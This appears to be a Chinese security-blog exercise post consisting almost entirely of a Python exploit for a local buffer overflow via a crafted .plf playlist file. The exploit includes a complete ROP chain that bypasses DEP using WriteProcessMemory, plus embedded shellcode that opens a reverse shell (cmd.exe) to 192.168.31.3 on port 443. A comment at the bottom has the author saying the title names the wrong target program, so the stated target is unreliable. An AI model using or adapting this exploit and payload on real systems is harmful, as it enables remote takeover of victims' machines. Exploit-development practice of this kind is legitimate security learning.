DEP绕过WriteProcessMemory练习 - BlazeDVD Professional 7.0

0x0dee 2024-03-04 01:03:22

import sys, os, time
from struct import pack

def rop() :
    ###                                                                         ###

    #    软件名称: BlazeDVD Professional 7.0 (load *.plf) Local Buffer Overflow (DEP Bypass)
    #    利用作者: 0x0dee                     
    #    使用模块: MediaPlayerCtrl.dll                    
    #    坏字符: 0x00 0x0a 0x1a              
    #    绕过DEP使用的API: WriteProcessMemory(WPM)  
    #    WPM在导入表中的地址: 0x640542dc
    #    代码洞地址: 0x64050dc0                
    #    可写地址: 0x6406efd0               

    ###                                                                         ###

    ropbuf =[ 
        0x6402c95f, # nop  ; ret  ;
        0xffffffff, # offset pad for esp
        0xffffffff,
        0xffffffff,
        0xffffffff,
        ## dereference WriteProcessMemory in import table
        0x640499a7, # pop eax ; ret  ;
        0x640542dc, ## WPM import table address
        0x64039d96, # mov eax, dword [eax] ; ret  ;  
        0x64046c72, # xchg eax, edx ; ret  ;  

        ## get call_struct address = esp + 204
        ## WPM call address = dword [640542dc]
        0x64025874, # push esp ; pop esi ; ret  ; 
        0x6404bf22, # mov eax, esi ; pop esi ; ret  ; 
        0xffffffff, ## pop to esi
        0x640502d4, # pop ecx ; ret  ;  
        0xfffffdfc, ## 0 - 204
        0x6403ed14, # sub eax, ecx ; ret  ;  
        0x640506f4, # pop ecx ; ret  ;  
        0x6406efd0, ## Writable address
        0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ; 

        ## return address = 64050dc0
        0x64040233, # inc eax ; ret  ; 
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0x64040233, # inc eax ; ret  ; 
        0x64040233, # inc eax ; ret  ; 
        0x64040233, # inc eax ; ret  ; 
        0x6405147a, # pop edx ; ret  ; 
        0x64050dc0, ## code cave for shellcode
        0x640506f4, # pop ecx ; ret  ;  
        0x6406efd0, ## Writable address
        0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ; 

        # hProcess = -1
        0x64040233, # inc eax ; ret  ; 
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0x64040233, # inc eax ; ret  ; 
        0x64040233, # inc eax ; ret  ; 
        0x64040233, # inc eax ; ret  ; 
        0x6405147a, # pop edx ; ret  ; 
        0xffffffff, ## -1 for hProcess
        0x640506f4, # pop ecx ; ret  ;  
        0x6406efd0, ## Writable address
        0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ; 

        # lpBaseaddress = 0x64050dc0
        0x64040233, # inc eax ; ret  ; 
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0x64040233, # inc eax ; ret  ; 
        0x64040233, # inc eax ; ret  ; 
        0x64040233, # inc eax ; ret  ; 
        0x6405147a, # pop edx ; ret  ; 
        0x64050dc0, ## code cave
        0x640506f4, # pop ecx ; ret  ;  
        0x6406efd0, ## Writable address
        0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ; 


        # lpBuffer = offset of call_struct + 0x30
        0x64046c72, # xchg eax, edx ; ret  ;  
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0x6401a3ac, # mov eax, edx ; ret  ; 
        0x640502d4, # pop ecx ; ret  ;  
        0xffffffd0, ## -0x30
        0x6403ed14, # sub eax, ecx ; ret  ;  
        0x64046c72, # xchg eax, edx ; ret  ;  
        0x6401a3ac, # mov eax, edx ; ret  ; 
        0x6404c6ff, # pop esi ; ret  ;
        0xffffffd4, ## -0x2c
        0x64041797, # add eax, esi ; pop esi ; ret  ;
        0xffffffff, ## for pop esi
        0x640506f4, # pop ecx ; ret  ;  
        0x6406efd0, ## Writable address
        0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ; 

        # nSize = 0x220
        0x64040233, # inc eax ; ret  ; 
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0x64040233, # inc eax ; ret  ; 
        0x64040233, # inc eax ; ret  ; 
        0x64040233, # inc eax ; ret  ; 
        0x64046c72, # xchg eax, edx ; ret  ;  
        0x64053bf1, # xor eax, eax ; ret  ; 
        0x640502d4, # pop ecx ; ret  ;  
        0xfffffde0, ## -0x220
        0x6403ed14, # sub eax, ecx ; ret  ;  
        0x64046c72, # xchg eax, edx ; ret  ;  
        0x640506f4, # pop ecx ; ret  ;  
        0x6406efd0, ## Writable address
        0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ; 

        # [OUT] *lpNumberOfBytesWrittten = 0x6406efd0
        0x64040233, # inc eax ; ret  ; 
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0x64040233, # inc eax ; ret  ; 
        0x64040233, # inc eax ; ret  ; 
        0x64040233, # inc eax ; ret  ; 
        0x6405147a, # pop edx ; ret  ; 
        0x6406efd0, ## .data writable address
        0x640506f4, # pop ecx ; ret  ;  
        0x6406efd0, ## Writable address
        0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ; 

        # call WPM
        0x6403ea41, # sub eax, 0x20 ; pop ebx ; ret  ;  
        0xffffffff, ## pop to ebx
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0x64039f50, # add eax, 0x08 ; ret  ;
        0x64032313  # push eax ; pop esp ; ret  ;



       # 0x6401a3ac, # mov eax, edx ; ret  ; 
       # 0x6401ccc0, # mov eax, ecx ; ret  ; 
       # 0x64048d30, # mov eax, ebx ; pop esi ; pop ebx ; ret  ; 
       # 0x64010341, # add al, 0xFF ; push edx ; pop eax ; pop esi ; ret  ; 
       # 0x64016676, # xchg eax, ebx ; ret  ;  
    ]

    return b''.join(pack("<L", _) for _ in ropbuf)

bufferSize = 0xe10 # 0xf58

# eip offset : 0n260
# esp offest : 0n280
# badchars : 0x00 0x0a 0x1a

buffer = b""
offsetOfEIP = b"A" * 260

ropbuf = rop()

buffer += offsetOfEIP + ropbuf

# shellcode size: 0x151 (337)
shellcode = b'\x89\xe5\x81\xc4\xf0\xf9\xff\xff\xeb\x06^\x89u\x04\xebN\xe8\xf5\xff\xff\xff`1\xc9d\x8bq0\x8bv\x0c\x8bv\x1cV\x8b^\x08\x0f\xb6F\x1e\x89E\xf8\x8bC<\x8b|\x03x\x01\xdf\x8bO\x18\x8bG \x01\xd8\x89E\xfc\xe3\x1dI\x8bE\xfc\x8b4\x88\x01\xde1\xc0\x8bU\xf8\xfc\xac\x84\xc0t\x0e\xc1\xca\x02\x01\xc2\xeb\xf4\xeb)^\x8b6\xeb\xbd;T$(u\xd6\x8bW$\x01\xdaf\x8b\x0cJ\x8bW\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89D$ ^aYZQ\xff\xe0\xb8\xb4\xb3\xff\xfe\xf7\xd8Ph32.DhWS2_Thhz\xc4v\xffU\x04\x89\xe01\xc9f\xb9\x90\x05)\xc8P1\xc0f\xb8\x02\x02Ph\x96 \x9e\xcc\xffU\x041\xc0PPP\xb0\x06P,\x05P@Phf ^\x81\xffU\x04\x89\xc61\xc0PPh\xc0\xa8\x1f\x03f\xb8\x01\xbb\xc1\xe0\x10f\x83\xc0\x02PT_1\xc0PPPP\x04\x10PWVh\x95 ^W\xffU\x04VVV1\xc0\x8dH\rP\xe2\xfd\xb0DPT_f\xc7G,\x01\x01\xb8\x9b\x87\x9a\xff\xf7\xd8Phcmd.\x89\xe3\x89\xe01\xc9f\xb9\x90\x03)\xc8PW1\xc0PPP@PHPPSPh\xc7(\xaa\x0b\xffU\x041\xc9Qj\xffh\xd2U\xa9.\xffU\x04'

offsetOfshellcode = b"\x90" * (0x204 + 0x30 - len(ropbuf) + 0x40)
buffer += offsetOfshellcode + shellcode

print("[ ] rop size "+ hex(len(ropbuf)))

buffer += b"Z" * (bufferSize - len(buffer))

file = open("venom_file.plf", "wb")
file.write(buffer)
print("[+] Write buffer " + str(len(buffer)) + " bytes.")
file.close()

评论

0

0x0dee

这个人很懒,没有留下任何介绍

随机分类

Android 文章:89 篇
IoT安全 文章:29 篇
运维安全 文章:62 篇
安全管理 文章:7 篇
无线安全 文章:27 篇

扫码关注公众号

WeChat Offical Account QRCode

最新评论

Article_kelp

因为这里的静态目录访功能应该理解为绑定在static路径下的内置路由,你需要用s

N

Nas

师傅您好!_static_url_path那 flag在当前目录下 通过原型链污

Z

zhangy

你好,为什么我也是用windows2016和win10,但是流量是smb3,加密

0

0x0dee

标题写错了,是ASX to MP3 3.1.3.7 - '.m3u' Local

K

k0uaz

foniw师傅提到的setfge当在类的字段名成是age时不会自动调用。因为获取

目录